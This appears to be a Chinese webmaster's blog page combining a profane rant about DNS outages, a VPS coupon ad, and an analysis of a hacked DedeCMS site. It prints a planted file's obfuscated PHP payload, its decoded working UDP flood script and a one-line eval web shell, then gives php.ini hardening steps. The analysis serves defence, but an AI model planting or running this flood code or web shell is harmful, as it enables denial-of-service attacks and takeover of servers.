新网 我草你大爷! 新网渠道都辞职吧 赶紧. MD 老子受不了了.DNS 天天挂啊…见过么…国内这么多注册商 哪个像你一样…DNS天天挂啊 天天挂啊 我草你大爷啊!
还让不让代理活了……….
新网 我草你大爷! 新网渠道都辞职吧 赶紧. MD 老子受不了了.DNS 天天挂啊…见过么…国内这么多注册商 哪个像你一样…DNS天天挂啊 天天挂啊 我草你大爷啊!
还让不让代理活了……….
photonvps 支持支付宝付款,支持win/linux操作系统的VPS。
HALFOFF 首月半价,以后续费原价。
TENOFF 终身九折,仅限月付使用。
优惠码使用地址:http://www.photonvps.com/
事件:win2003遭受udp攻击,网络带宽占用大,导致网络堵塞。服务器瘫痪。
服务器带宽应用占到80-100%,网络堵塞,网站无法访问,连系统自带远程控制也连接不上!
分析:
⒈通过服务器“本地连接状态”可以看到,发送的字节增长速度很快(几乎10m/s),收到的字节很少!
在cmd 里用 netstat -an 查看到服务器连接的都是同一个ip ,端口都是连续的 。
根据这个可以判定不是DDOS攻击,因为DDOS是不断收到大量数据包。
⒉关闭iis,带宽过一会就正常, 可以判定是网站导致的!然后一个个网站排查(从来没有见过这样的情况,通过页面调用往外发包的)!
查找:DEDECMS的plus目录下有一个lndex.php 访问地址为/plus/lndex.php?ip=XXX.XXX.XXX.XXX&port=80&time=600
.index.php代码为
<?php
/*
gl*/
eval(gzinflate(base64_decode(’
DZNHkqNIAADv85HpDg4tTGFidrYDCRBOOOEvG5gqrPBOvH77CRmZ+f3vP99DOfz6Bbek/SjOqkNtssCPNJkhTf2Xw
6zP4cdvIbfUZlQ1XhQchHDF3z39Ldpx33Lk9Xm78dUoCHeKfilO46tqg21DiEg+BCTz9QW/GD+lMGtThrSmdSEMLb
VkzvPt3s0UMS3mDx0WoG2nY+gB2L+fufDyzPU6gNJxAYSarbsanhimzJbUoqZuY0+lV4H6GZtDX9LxkE9L29swfGY
ibUTtUsoPqIRi7nFBpdmW0t5ECFWjzmfZe2xqERmtMLVpOqnY436BfrDxK10KYOfGAWN7s3geqB7RdV7WkxiBHZU4
wyW0LXsmyTdcdwk3TOjduh1F8cyvsgYuaejeLi23csLONsqDsU3gx60zLlm5XQ9jqhbyq949qvb2Us1dqsAGpYvfG
3IHY4TxaemBF2mKKY9StKJuDDHxfmI3z+eWa7OwlgvrxeB5Qz4AE2drfLAYmo6litZOUL1GxMlavOlDW8/OMb7ci1
3dLk1y9XDddGgA4onEBZ0vmx8aSWApy6q2JkpO0i8kg1qOx7EVPgEJNSOLyzZIW8ApDL+V0/0Fstph3qQI+1qQuCw
xiZH1aaTMKJItxW5rmz4WyrGmOKCUtLvAU2dle3a85a0GJJQWOGX5AnHiILQpplJ9mdpdQsw9TybO4whCCMqjfgOu
SJ+rRT+2Ok8rbc/oVd47v+J02tAy9fkMTP2u8HuUo1Ezp5F3XCMyL6ftJAkw+h+R1ljN0M0NYS/TXCpeY1tyOl7Aw
e8dP5ygq1VxAFoEKQD6EGdWsWMeBzSruEjIQeRbtgx0oRpw2CnKoxFs/KdiQauXc26QYtLSbeaxiAWLeq784jjWnu
bV2kpIarL4bMVgNxv+9QwM8j1FvNR1yGa9lVsF1hM63tSpymtn4k1QFEGLVowe93kyhxGbRpNXICoPk3oqbB6DL3c
hsJ4OwQk4FOIc2k4MQ3tKy/vfv78/Pz///Pr+Gfd/’)));
复制代码
破解的代码为
<?php
$packets = 0;
$ip = $_GET[\'ip\'];
$rand = $_GET[\'port\'];
set_time_limit(0);
ignore_user_abort(FALSE);$exec_time = $_GET[\'time\'];
$time = time();
print \”Flooded: $ip on port $rand <br><br>\”;
$max_time = $time+$exec_time;for($i=0;$i<65535;$i++){
$out .= \”X\”;
}
while(1){
$packets++;
if(time() > $max_time){
break;
}$fp = fsockopen(\”udp://$ip\”, $rand, $errno, $errstr, 5);
if($fp){
fwrite($fp, $out);
fclose($fp);
}
}
echo \”Packet complete at \”.time(\’h:i:s\’).\” with $packets (\” . round(($packets*65)/1024, 2) . \” mB) packets averaging \”. round($packets/$exec_time, 2) . \” packets/s \\n\”;
?>
<?php eval($_POST[ddos])?>
也就是说只要访问网站的/plus/lndex.php?ip=xx.xx.xx.xx&port=80&time=600 就会UDP攻击xx.xx.xx.xx
修复DEDECMS漏洞 php.ini 修改allow_url_fopen = Off
在c:\windows\php.ini里设置:
disable_functions =gzinflate;
在c:\windows\php.ini里设其值为Off
allow_url_fopen = Off
并且:
;extension=php_sockets.dll
前面的;号一定要有,意思就是限制用sockets.dll
前面的;号要保留
然后重启IIS
如果还不行,就去买个防火墙吧!